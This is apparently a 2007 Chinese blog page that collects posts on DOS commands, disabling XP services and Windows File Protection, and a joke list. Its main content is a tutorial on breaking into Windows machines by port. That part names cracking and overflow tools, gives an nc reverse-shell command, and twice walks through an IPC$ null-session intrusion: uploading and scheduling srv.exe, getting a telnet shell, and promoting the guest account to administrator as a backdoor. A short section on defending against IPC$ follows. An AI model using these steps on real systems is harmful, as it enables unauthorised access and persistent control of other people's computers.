|
|
其实它就是一个文本编辑软件,使用它可以在DOS下方便地对文本文件进行编辑,格式为\"EDIT [文件名] [参数]\",它的参数不是特别实用,我在此就不多讲。
3)SYS(Sys.COM)--系统引导文件传输命令
它能够将IO.SYS等几个文件传输到目的磁盘,使其可以引导、启动。格式为\"SYS [盘符]\"
4)ATTRIB(Attrib.EXE)--文件属性设置命令
通过该命令,我们可以对文件进行属性的查看和更改。格式为\"ATTRIB [路径][文件名] [参数]\",如果不加参数则为显示文件属性。它的参数有\"+?\"和\"-?\"两种,\"?\"代表属性代号,这些代号有:\"H\"隐藏;\"S\"系统;\"R\"只读,\"+\"表示赋予,\"-\"表示去除。
5)XCOPY(Xcopy.EXE)--拷贝命令
该命令在\"COPY\"的基础上进行了加强,能够对多个子目录进行拷贝。它的参数比较多,但是最常用的是\"/S\",它可以对一个目录下属的多个子目录进行拷贝,另外\"/E\"可以拷贝空目录。格式为\"XCOPY [源路径][源目录/文件名] [目的目录/文件名] [参数]\"。
6)SCANDISK(Scandisk.EXE)--磁盘扫描程序
这个命令在实际的操作中有很大的用处,它能对磁盘进行扫描并修复,能够解决大部分的磁盘文件损坏问题。格式为\"SCANDISK [盘符:] [参数]\"下面是它的几个参数:
/fragment [驱动器名:\\路径\\文件名]:使用这个参数可以显示文件是否包含有间断的块,我们可以通过运行磁盘整理程序来解决这个问题;
/all:检查并修复所有的本地驱动器;
/autofix:自动修复错误,即在修复时不会出现提示;
/checkonly:仅仅检查磁盘,并不修复错误;
/custom:根据Scandisk.ini文件的内容来运行Scandisk,Scandisk.ini是一个文本文件,它包含了对Scandisk程序的设置,其中的[custom]块是在加上\"/custom\"参数后才执行的,用户可以根据自己的不同情况来进行不同的设置;
/nosave:在检查出有丢失簇后直接删除,并不转化为文件;
/nosummary:不显示检查概要,完成检查后将直接退出程序;
/surface:在完成初步检查后进行磁盘表面扫描;
/mono:以单色形式运行Scandisk。
我们可以根据不同的情况来加上不同的参数。我们可以执行\"scandisk /all /checkonly /nosave /nosummary\"来完成对磁盘的检查并且自动退出,另外还可以编辑scandisk.ini文件中设置,再运行\"scandisk /custom\"。如果被损坏的文件比较多,我们可以使用\"/autofix\"来进行自动修复,不然会忙死你的。
7)CHKDSK(Chkdsk.EXE)--磁盘检查命令
它会检查磁盘,并会显示一个磁盘状态报告。格式为\"CHKDSK [盘符:] [参数]\",最常用的参数是\"/F\",可以对文件错误进行修复。
8)MOVE(Move.EXE)--文件移动命令
使用它可以对文件进行移动。格式为\"MOVE [源文件] [目的路径]\"。同时也可以使用通配符。
9)DELTREE(Deltree.EXE)--删除命令
这可是DEL命令的超级加强版,它不仅可以删除文件,并且会将指定目录和其下的所有文件和子目录一并删掉。使用它,我们可以很方便的对目录进行彻底的删除。格式\"DELTREE [文件/路径] [参数]\",参数有一个\"/Y\",使用时系统会对每个文件进行询问,回答\"Y\"后才删除。
10)FDISK(Fdisk.EXE)--分区命令
我们可以使用它对硬盘进行分区操作,我在下一部分会进行具体讲解。
以上就是常用的一些DOS外部命令,使用它们可以使你的操作更方便,同时也是进行系统修复所必不可少的。请大家好好地掌握每一个命令及其用处。
查看(25) 评论(0)
XP中可禁用的服务
2007-6-26
在开始之前,我们必须了解一些相关的小知识:
服务其实是Win 2000/XP/2003中一种特殊的应用程序类型,不过它是在后台运行,所以我们在任务管理器看不到它。
安装Win XP后,通常系统会默认启动许多服务,其中有些服务是普通用户根本用不到的,不但占用系统资源,还有可能被黑客所利用。
查看正在启用的服务项目
以Win XP为例,首先你要使用系统管理员账户或以拥有Administrator权限的用户身份登录,然后在“运行”中输入“cmd.exe”打开命令行窗口,再输入“net start”回车后,就会显示出系统正在运行的服务
为了更详细地查看各项服务的信息,我们可以在“开始→控制面板→管理工具”中双击“服务”,或者直接在“运行”中输入“Services.msc”打开服务设置窗口
关闭、禁止与重新启用服务
服务分为三种启动类型:
1.自动:如果一些无用服务被设置为自动,它就会随机器一起启动,这样会延长系统启动时间。通常与系统有紧密关联的服务才必须设置为自动。
2.手动:只有在需要它的时候,才会被启动。
3.已禁用:表示这种服务将不再启动,即使是在需要它时,也不会被启动,除非修改为上面两种类型。
如果我们要关闭正在运行的服务,只要选中它,然后在右键菜单中选择“停止”即可。但是下次启动机器时,它还可能自动或手动运行。
如果服务项目确实无用,可以选择禁止服务。在右键菜单中选择“属性”,然后在“常规→启动类型”列表中选择“已禁用”,这项服务就会被彻底禁用。
如果以后需要重新起用它,只要在此选择“自动”或“手动”即可;也可以通过命令行“net start
查看(17) 评论(0)
解决WINDOWS文件保护的方法
2007-6-26
一、插入系统安装光盘,并运行sfc /scannow命令检测并修复可能受损坏和更改的系统文件.(这样就不会再出现了)
二、运行gpedit.msc打开组策略,并依次展开至计算机配置--管理模板--系统--windows文件保护
找到“设置文件保护”,双击并修改为“已禁用”重新启动系统就搞定了
.Windows文件保护功能:
当一个应用程序试图替换一个受保护的文件,系统检查替换文件的数字签名,以确定此文件是否是来自微软和是否是正确的版本。如果这两个条件都符合,则允许替换。正常情况下,允许替换系统文件的文件种类包括Windows的服务包,补丁和操作系统升级程序。系统文件还可以由Windows更新程序或Windows设备管理器/类安装程序替换。如果这两个条件没有同时满足,而受保护文件将被新文件替换了,但将很快系统会寻找正确的文件替换回来。当这种情况发生时,Windows首先会从安装在计算机的DLLCache文件夹(备份的系统文件)中复制正确版本的文件,如果电脑上的
DLLCache文件受损,系统会从Windows安装CD盘来取得复制,也就会出现你所看到的
对话框了。
把Windows安装盘放入CD-ROM照指示做就行了。
要是不用什么大型软件和对系统稳定性不是要求很高,点击“取消”也可以的。不过这对话框会再出现的,你可以彻底关闭文件保护
开始-运行-输入regedit
从注册表中找到HKEY_LOCAL_MACHINESOFTWAREMicrosoft Windows NTCurrentVersionWinlogon ,修改\"SFCDisable\"键值为\"FFFFFF9D\",如果需要重新启用该功能,重新设置为\"0\"就可以了。
2.在注册表中找到这一项
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]
更改为一下内容,没有就添加(注意键值为dword)
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]
\"SFCDisable\"=dword:ffffff9d
可以关闭系统文件保护。建议先备份注册表,在操作。
两种方法轻松实现Windows系统文件保护功能
Windows操作系统的稳定性和安全性越来越受人重视,从Windows2000开始,系统就提供一种文件保护机制功能(Windows File Protection)。该功能可以有效地保护Window s中某些重要的系统文件夹,如DLL、OCX、SYS、CPL等后缀的文件。而且系统会自动备份这些文件到“%SYSTEMROOT%\\system32\\dllcache”目录中,一旦受保护的文件被破坏或替换,Windows文件保护功能自动
从dllcache目录中的备份、恢复这些文件。但我们如何使用文件保护功能呢?下面就介绍两种方法。
方法一:组策略
点击“开始→运行”,在运行对话框中输入“gpedit.msc”命令,打开了组策略编辑器,打开“计算机配置→管理模板→系统→Windows文件保护”,在右侧窗体中显示四条文件保护策略
查看(56) 评论(0)
SO 定理
2007-6-26
⒈有幾個地方是不能去的:指甲,趾甲,疤痕,鼻孔,別魜得鮱厷.
⒉經常打開WINDOWS,既可以看到名月裝飾你的窗子,又可以保持室內空氣新鮮.
⒊對待誘惑要四體不勤,對待飲食要五穀不分,對待原則要六親不認.
⒋好男兒志在四方,好男兒敢下廚房.
⒌養生之道在於少生欲望和煩惱,養眼之道在於多看美女與帥哥.
⒍放電是一種情趣,充電則是自我進取.
⒎提倡健康情感,除非你已練就金剛不壞之\"心\"------能負荷過分刺激.
⒏珍惜每次奇妙的奇遇,兩人交談的最佳距離為⒈3米,最佳角度為30度.
⒐不合時宜的思想:過把癮就死/人不為己天誅地滅/以不變應萬變......
10.小心做人,不要隨便懷孕...
11.男女分手時,說對不起的那個是贏家.
12.讀書之樂恰如那女之事----(⒈夜晚最瑕意.⒉多半在床上.⒊其中佳趣不易向外人道也).
13.記紸,兲是爹,娘是地,鮱嘙就是玉諻汏帝,寧牁驚兲動地,卟牁驚動玉皇大帝!
14.為解緩業压力,,博士畢業后可以申請\"壯士\"学位,4年後,可以再读\"聖鬥士\"学位,在\"聖鬥士\"流动站后,还可以读\"烈士\"学位.
15.婚姻如一把剪刀連在一起不可分開;虽然经常背道而驰;但是惩罚走到他们中间的人.
15.在一个男個年时代,妻子是他的情人;中年时,妻子是他的伴侣;老年时,妻子是他的护時...
16.什么是爱情?两个灵魂,一个肉体;什么是友谊?两个肉体,一个灵魂.
17.沸騰锝水能殺死細菌.熱戀和沸水一樣,也能殺滅當事人的缺點和不足...
查看(14) 评论(0)
各个端口的入侵 以及工具名称
2007-6-26
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03***26、ms03***39、ms03***49、ms04***11漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
1. C:\\>net use \\\\127.0.0.1\\IPC$ \"\" /user:\"admintitrators\"
这是用\"流光\"扫到的用户名是administrators,密码为\"空\"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连
接,因为密码为\"空\",所以第一个引号处就不用输入,后面一个双引号里的是用户名
,输入administrators,命令即可成功完成。
2. C:\\>copy srv.exe \\\\127.0.0.1\\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的
c:\\winnt\\system32\\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\\>net time \\\\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\\>at \\\\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
5. C:\\>net time \\\\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备
开始下面的命令。
6. C:\\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的
是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打
算建立一个Telnet服务!这就要用到ntlm了
7.C:\\>copy ntlm.exe \\\\127.0.0.1\\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\\WINNT\\system32>ntlm
输入ntlm启动(这里的C:\\WINNT\\system32>指的是对方计算机,运行ntlm其实是让这
个程序在对方计算机上运行)。当出现\"DONE\"的时候,就说明已经启动正常。然后使
用\"net start telnet\"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作
一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\\>net user guest /active:yes
将对方的Guest用户激活
11. C:\\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我
们可以用guest再次访问这台计算机)
win2000/xp/2003杀进程命令
1. “开始”->“运行”->输入:cmd
2. 在打开的窗口上输入:ntsd -c q -p PID的值
说明:把最后那个PID,改成你要终止的进程的ID。如果你不知道进程的ID是什么,可以通过下述方法查看:“任务管理器”->“进程”选项卡->“查看”菜单->“选择列”命令->勾上“PID(进程标识符)”,然后就能看见了。
用TELNET弱口令
我给你例子看好了
c:\\>telnet 192.168.0.1
user:administrator
possword:[如果是弱口令 密码可能是空的或是简单的]
下面就进入他的shall了
c:\\>net user hacker[用户]hacker[密码 自己定义] /add
c:\\>net localgroup administrator hacker [用户] /add
这是个自己在他的计算机中建立自己的用户
并提升为管理员权限
还有你可以用IPC$命令 攻击
ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)
1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.
六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。
七 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\LSA]把RestrictAnonymous = DWORD的键值改为:000****0001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters]把AutoShareServer(DWORD)的键值改为:000****0000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters]把AutoShareWks(DWORD)的键值改为:000****0000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
八 相关命令
1)建立空连接:
net use \\\\IP\\ipc$ \"\" /user:\"\" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use \\\\IP\\ipc$ \"用户名\" /user:\"密码\" (同样有3个空格)
3)映射默认共享:
net use z: \\\\IP\\c$ \"密码\" /user:\"用户名\" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\\\IP\\c$
4)删除一个ipc$连接
net use \\\\IP\\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:\\>net use \\\\127.0.0.1\\IPC$ \"\" /user:\"admintitrators\"
这是用《流光》扫到的用户名是administrators,密码为\"空\"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为\"空\",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\\>copy srv.exe \\\\127.0.0.1\\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\\winnt\\system32\\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\\>net time \\\\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\\>at \\\\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\\>net time \\\\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\\>copy ntlm.exe \\\\127.0.0.1\\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\\WINNT\\system32>ntlm
输入ntlm启动(这里的C:\\WINNT\\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现\"DONE\"的时候,就说明已经启动正常。然后使用\"net start telnet\"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\\>net user guest /active:yes
将对方的Guest用户激活
11. C:\\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机 |
|
发表于 2008-11-5 17:33:18